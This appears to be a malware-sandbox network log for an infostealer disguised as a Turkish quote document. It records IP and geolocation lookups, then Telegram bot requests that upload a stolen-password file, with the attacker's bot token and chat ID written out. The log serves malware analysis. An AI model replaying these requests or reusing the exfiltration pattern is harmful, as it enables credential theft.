6	192.168.2.8	49723	132.226.247.73	80	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:10:30.705426931 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:10:33.669811964 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	132.226.247.73	80	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:10:34.583040953 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:10:35.527400017 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49710	104.21.96.1	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:09:59 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:09:59 UTC	869	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:09:59 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1760988 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQ%2BO0z%2BDSvRpMKfWMMmE6xFJrI%2BkLnLySgH2UJQ1xGVQVNQB2CyIj6uWesb%2BtPy8A7%2F37o5d%2FveKysmspPtZSURlYrK4IRKc%2FrtayfwfoU9Hu3PNnLZYWaTBoH%2F%2BpHMeL%2BTfaCDc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff661a9bfb672a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1933&min_rtt=1923&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457085&cwnd=212&unsent_bytes=0&cid=514b0ed8450986e5&ts=402&x=0"
2025-01-09 18:09:59 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49711	104.21.96.1	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:10:00 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 18:10:00 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:00 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1760989 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OPFCmMb69uNqGncXI5Eo%2FRkiyh%2FYQfDRGvl8ThEocf7wqwzKg%2FWX%2FMvIfMBvK4Jr9%2BGm5bBLoTyiiVTd%2FsEgFMlZlEjZ6Jmva5foMPGhgmcRSB7LGIAKyJuhJr9OcCH9bAv%2BgPaH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff661af1e034363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1630&rtt_var=615&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1791411&cwnd=240&unsent_bytes=0&cid=2e9037b77bd1bdc7&ts=167&x=0"
2025-01-09 18:10:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	104.21.96.1	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:10:02 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 18:10:02 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1760991 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SwcbUNVEK8JR7hIipPmns0GKtsNHT4LMgQr7rHjCWumVhW7%2FWyreR%2FD6B2jrylN7FU2EM0rGl71Kk1sdsL%2B0R9o0oD3ux8iPVNNtIsgDUfw4KN0td%2FGHJ9XZjwELePm5c2uRBHip"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff661beb9004363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1635&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1703617&cwnd=240&unsent_bytes=0&cid=02f135f02e236ee4&ts=142&x=0"
2025-01-09 18:10:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49719	104.21.96.1	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:10:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:10:21 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761011 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hr16VQnvRdRUo2IABrLz2d9AhOX4SANr5sMwk4bSAK97QGaKOeCrC61d%2BEKwBQ%2Fvcr0HIu0XrnfzZJD%2B7YrENFrRKMeVd33aNJGOrcVFcyPZ6qFqyxk%2BIujQwc4PbHg22xoGwDKe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff66236d98ec32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1571&rtt_var=859&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1101471&cwnd=178&unsent_bytes=0&cid=a468a20c9e8a6899&ts=163&x=0"
2025-01-09 18:10:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49721	104.21.96.1	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:10:26 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 18:10:26 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761015 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hEcyO2gJ8VDdc%2FnBcAJH2m0GcOpfRZ7bO50oVAt60FzKwGrJNMNnJalAJ3HzkacBM%2F%2BiaX0iaqMOM8rLOpt3GT2VD4UFjyb0Ee5c7Wwgi0itcMX158NnPBHXkFsIJMh%2F%2Fjmt6G%2Ff"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff662555e384363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1581&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1783750&cwnd=240&unsent_bytes=0&cid=b8a749ab556efeaf&ts=157&x=0"
2025-01-09 18:10:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49724	104.21.96.1	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:10:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:10:34 UTC	860	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761023 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ks7U8RswLd%2FHUqU8MAf8OhbVzs8jRqn%2FSRnrjYSmzJyVW4RUxVJGvz8SvsLddPD6IDphJd%2FAKXqaY73kJmoKRVFn6mRCBbsJQcXNNKyZK7Nm2rAcwXJuXwCD5iHKO%2BcYyHMPVae"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff662855d4c72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20275&min_rtt=1994&rtt_var=11738&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1464393&cwnd=212&unsent_bytes=0&cid=a785840eace89041&ts=251&x=0"
2025-01-09 18:10:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49726	104.21.96.1	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:10:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 18:10:36 UTC	854	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761025 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f6YlvA5If7pyG27CSmTyOI3njj0nTQHDNWg7HWoPKZhaXGXNva80LH5UQX9L9KhTKe%2FCL7z1VEd9gvEXg%2FwLQZlfrttIX7Ge7j55ULnjmNUOp9Jpct8fLy3PZdve6Y61wkPeNv8x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff6629058a11a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2544&min_rtt=2067&rtt_var=1116&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1412675&cwnd=157&unsent_bytes=0&cid=d203b5944ac9088a&ts=280&x=0"
2025-01-09 18:10:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49727	149.154.167.220	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:10:37 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:38:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-09 18:10:37 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:10:37 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:10:37 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49728	149.154.167.220	443	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:10:44 UTC	347	OUT	POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd3291d7f9c807 Host: api.telegram.org Content-Length: 573
2025-01-09 18:10:44 UTC	573	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 39 31 64 37 66 39 63 38 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 31 33 38 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 39 2f 30 31 2f 32 30 32 35 20 2f 20 31 33 3a 30 39 3a 35 36 Data Ascii: --------------------------8dd3291d7f9c807Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:813848Date and Time: 09/01/2025 / 13:09:56
2025-01-09 18:10:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:10:44 GMT Content-Type: application/json Content-Length: 532 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:10:44 UTC	532	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 31 31 31 32 37 33 37 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 65 6c 47 72 6f 75 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 65 6c 31 30 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 37 33 32 36 38 32 30 34 31 2c 22 74 69 74 6c 65 22 3a 22 44 65 6c 65 74 65 64 20 47 72 6f 75 70 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 34 36 32 34 34 2c 22 64 6f 63 75 6d 65 6e Data Ascii: {"ok":true,"result":{"message_id":13757,"from":{"id":7611127374,"is_bot":true,"first_name":"DelGroup","username":"Del101bot"},"chat":{"id":-4732682041,"title":"Deleted Group","type":"group","all_members_are_administrators":true},"date":1736446244,"documen

